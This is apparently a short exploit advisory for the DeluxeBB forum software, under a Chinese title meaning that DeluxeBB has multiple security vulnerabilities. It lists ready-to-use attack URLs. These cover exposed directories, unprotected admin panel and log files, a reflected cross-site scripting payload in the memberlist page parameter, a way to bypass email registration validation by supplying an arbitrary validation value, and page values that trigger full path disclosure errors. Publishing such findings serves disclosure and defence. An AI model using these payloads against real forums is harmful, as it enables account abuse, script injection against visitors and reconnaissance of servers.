DeluxeBB存在多个安全漏洞

# Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com<http://gmail.com> # Vendor: http://www.deluxebb.com # #[Directory Listing] http://server/templates/ http://server/images/ http://server/logs/ http://server/wysiwyg/ http://server/docs/ http://server/classes http://server/lang http://server/settings/ # # #[Cross Site Scripting] http://server/misc.php?sub=memberlist&page=-111111111111111111%3Cscript%3Ealert(1)%3C/script%3E # # #[Unprotected Admin Panel Files] http://server/templates/deluxe/admincp/ http://server/templates/corporate/admincp/ http://server/templates/blue/admincp/ # # #[Unprotected Log Files] http://server/logs/cp.php # # #[Mail Registration Validation Bypass] After the user registration procedure, Simply enter to the link: http://server/misc.php?sub=valemail&valmem=[USER_ID]&valnum=cp77fk4r you can get your [USER_ID] on the last page of Member-List section: http://server/misc.php?sub=memberlist&page=[LAST_PAGE] # # # #[Full Path Disclosure] http://server/misc.php?sub=memberlist&page=-11111111111111111 -you'll get an error like: Fatal error: Maximum execution time of 30 seconds exceeded in [FULL_PATH]/tools.php on line [..] or: http://server/misc.php?sub=memberlist&page=-1.11111111111111E+FF -you'll get an error like: Fatal error: Allowed memory size of 68157440 bytes exhausted (tried to allocate 66584545 bytes) in [FULL_PATH]/tools.php on line [..] # # #[E0F]